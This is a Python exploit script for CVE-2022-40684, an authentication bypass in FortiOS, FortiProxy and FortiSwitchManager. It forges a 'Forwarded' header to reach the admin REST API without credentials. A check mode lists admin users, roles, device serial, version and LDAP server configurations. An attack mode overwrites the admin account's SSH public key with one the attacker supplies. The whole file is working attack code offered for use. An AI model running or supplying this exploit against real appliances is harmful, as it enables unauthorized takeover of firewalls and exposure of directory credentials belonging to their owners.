CVE-2022-40684.py

import argparse
import requests
import sys
import json
from colorama import Fore, Style, init
import warnings

init(convert=True)

warnings.filterwarnings('ignore')


artwork = '''
              .,-:;//;:=,
          . :H@@@MM@M#H/.,+%;,
       ,/X+ +M@@M@MM%=,-%HMMM@X/,
     -+@MM; $M@@MH+-,;XMMMM@MMMM@+-
    ;@M@@M- XM@X;. -+XXXXXHHH@M@M#@/.
  ,%MM@@MH ,@%=             .---=-=:=,.
  =@#@@@MX.,                -%HX$$%%%:;
 =-./@M@M$                   .;@MMMM@MM:
 X@/ -$MM/    Developed by:    . +MM@@@M$
,@M@H: :@:   Mohamed Benchikh  . =X#@@@@-
,@@@MMX, .  (@mohamedbenchikh)  /H- ;@M@M=
.H@@@@M@+,                      %MM+..%#$.
 /MMMM@MMH/.                   XM@MH; =;
  /%+%$XHH@$=               , .H@@@@MX,
   .=--------.           -%H.,@@@@@MX,
   .%MM@@@HHHXX$$$%+- .:$MMX =M@@MM%.
     =XMMM@MM@MM#H;,-+HMM@M+ /MMMX=
       =%@M@M#@$-.=$@MM@@@M; %M%=
         ,:+$+-,/H#MMMMMMM@= =,
               =++%%%%+/:-.
        
Authentication Bypass Exploit (CVE-2022-40684)
Affected Products: FortiOS, FortiProxy and FortiSwitchManager
Use at your own risk!
'''

headers = {
    'User-Agent': 'Report Runner',
    'Forwarded': 'for="[127.0.0.1]:8080";by="[127.0.0.1]:8081";'
}


def add_user(target, key_path):
    key = open(key_path).read().strip()
    data = {
        "ssh-public-key1": f'"{key}"'
    }
    req = requests.put(f'https://{target}/api/v2/cmdb/system/admin/admin',
                       headers=headers, json=data, verify=False)

    if 'SSH key is good' not in req.text:
        print(f'[-] {target} is not vulnerable!')
    else:
        print(
            f'[+] SSH key for {Fore.GREEN}admin{Style.RESET_ALL} was added successfully!')


def check(target):

    print("Checking target: {}".format(target))

    req = requests.get(f"https://{target}/api/v2/cmdb/system/admin",
                       headers=headers, verify=False)

    if(req.status_code == 200):
        print(Fore.RED + f"[+] {target} is vulnerable" + Style.RESET_ALL)
        data = json.loads(req.text)
        print(
            f"[*] Found {Fore.GREEN + str(len(data['results'])) + Style.RESET_ALL} users")
        if args.verbose:
            for user in data['results']:
                print(
                    f"[+] Username: {Fore.GREEN + user['name'] + Style.RESET_ALL}")
                print(
                    f"[+] Role: {Fore.GREEN + user['accprofile'] + Style.RESET_ALL}")

        print("[+] Serial: {}".format(data['serial']))
        print("[+] Version: {}".format(data['version']))

        req = requests.get(
            f"https://{target}/api/v2/cmdb/user/ldap", headers=headers, verify=False)

        data = json.loads(req.text)

        print(f'Found {len(data["results"])} LDAP configs')
        for (index, config) in enumerate(data['results']):
            print(Fore.GREEN + "*"*20 +
                  f" LDAP Config #{index} " + "*"*20 + Style.RESET_ALL)
            print(
                "[+] LDAP Host: {}".format(config['name']))
            print(
                "[+] LDAP IP: {}".format(config['server']))
            print(
                "[+] LDAP Distinguished Name (DN): {}".format(config['dn']))
            print(
                "[+] LDAP Username: {}".format(config['username']))

    else:
        print("[-] The target is not vulnerable")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '-t', '--target', help='The IP address of the target')
    parser.add_argument(
        '-c', '--check', help='Check if the target is vulnerable', action='store_true')
    parser.add_argument(
        '-a', '--attack', help='Overwrite admin ssh key', action='store_true')
    parser.add_argument(
        '-v', '--verbose', help='Increase Verbosity', action='store_true')
    parser.add_argument('-k', '--key-file',
                        help='The SSH key file', required=('--attack' in sys.argv or '-a' in sys.argv))
    args = parser.parse_args()

    if args.target:
        args.target = args.target.rstrip('/').split('://')[-1]
    else:
        print(artwork)
        parser.print_help()
        exit()

    if args.check:
        check(args.target)
    elif args.attack:
        add_user(args.target, args.key_file)
    else:
        print("Please Specify attack or check mode")